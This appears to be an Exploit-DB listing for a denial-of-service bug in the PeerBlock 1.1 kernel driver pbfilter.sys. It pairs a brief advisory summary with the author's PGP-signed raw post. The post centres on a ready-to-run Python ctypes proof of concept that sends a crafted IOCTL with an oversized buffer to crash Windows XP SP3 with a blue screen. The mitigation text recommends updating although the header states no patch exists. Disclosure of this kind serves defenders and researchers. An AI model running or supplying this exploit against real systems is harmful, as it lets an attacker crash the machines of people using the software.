header-logo
Suggest Exploit
vendor:
PeerBlock
by:
shinnai
7.5
CVSS
HIGH
BSOD (Blue Screen of Death)
CWE
Product Name: PeerBlock
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP3

PeerBlock 1.1 BSOD

The PoC (Proof of Concept) allows an attacker to create a blue screen of death (BSOD) on systems running PeerBlock 1.1. The vulnerability is caused by a buffer overflow in the pbfilter.sys driver. By sending a specially crafted IOCTL request to the driver, an attacker can trigger the buffer overflow and crash the system, resulting in a BSOD. The vulnerability has been tested on Microsoft Windows XP Professional SP3.

Mitigation:

Install the latest version of PeerBlock and ensure that all security patches and updates are applied. It is also recommended to use a firewall and other security measures to protect against potential attacks.
Source

Exploit-DB raw data:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=======================================================================================================
=======================================================================================================
 PeerBlock 1.1 BSOD

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://www.shinnai.altervista.org/

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Tested on:
 Microsoft Windows XP Professional
 5.1.2600 Service Pack 3 Build 2600
 X86-based PC

 Info:
 PoC released as is, I have no time at the moment for further investigations

- -----------------------------------------------------------------------
 FILE INFO: (http://www.peerblock.com/)
- -----------------------------------------------------------------------
 File:             C:\Program Files\PeerBlock\pbfilter.sys
 MD5 hash:         2f6e885c432927a186c2e352c8a1cbf4
==============================================================================================================================
==============================================================================================================================

 Proof of concept:

 from ctypes import *
 
 kernel32 = windll.kernel32
 Psapi    = windll.Psapi
 
 if __name__ == '__main__':
     GENERIC_READ  = 0x80000000
     GENERIC_WRITE = 0x40000000
     OPEN_EXISTING = 0x3
     CREATE_ALWAYS = 0x2
 
     SYM_NAME   = "\\\\.\\pbfilter"
     dwReturn      = c_ulong()
     out_buff      = "A" * 4000
     in_buff       = ("")
 
     handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)
     dev_ioct = kernel32.DeviceIoControl(handle, 0xabab, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)

==============================================================================================================================
==============================================================================================================================

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)

iQIcBAEBAgAGBQJPM5D3AAoJEJfnJLqVA1kXbmwP/AhtZQ9aRnnfBLK4CmvNEorj
fhacEfnsf95dcGkHB7UDPmUR/vPsOFHzXDNzKQbzV0RAOK8zPDnXWP8X2I8rEnUx
a1ULw0wwo/07R2n4UvbqVDE5Pw3L2ZM9OEBvbg/SmEmPTYmFLXRkl/qwrruOp2be
UJN5Bm8rjOZl9SaOEMb++cdaU1ieKJIsphNPeH7sOpkg3atBmBaJYzCL/Px66/QB
CqjanfugZP6kn6fUo3rbM0LtzHOlMzP/ZCQl5EYK/G98N6YzD9wOuZV4L3foPG6a
8dJg7VpNA+umiKgqQ8iIVb0dvPJy46nn0p9bmcqbyil8S98SHaiqIx5QYyLt1jsG
PVxAhWk0ec0HXAGgBv2vwKMWy85/BhI7ermaoMIHo+fUFjjgu4L3WRwv+E4mZuQD
zUBn/KV6GpWas/zPD41AHWPz0P89V0IMtK5w2DKAejCBoxGyUkNbjBnBClfRmRAL
wukua8ZPp5htGUQomjpjrZIu3d+EtWIG2dFKmUNByUfc3z4anY0MU8Cf+dKOduG4
reNP52yJzbcxdxrAVA/GazE5QhqR0eLIf/oq27Lm1Zma/ZRD1B6h50W5nX8zOgzd
CW5S6xKQpQRytRDfqrGhYAnaHnGlGTmmhQ4rW9twiV8Ygn6Rz8SM9KmkTzM2P55t
+PizKEH12PrXQX8t3GNc
=Sbvp
-----END PGP SIGNATURE-----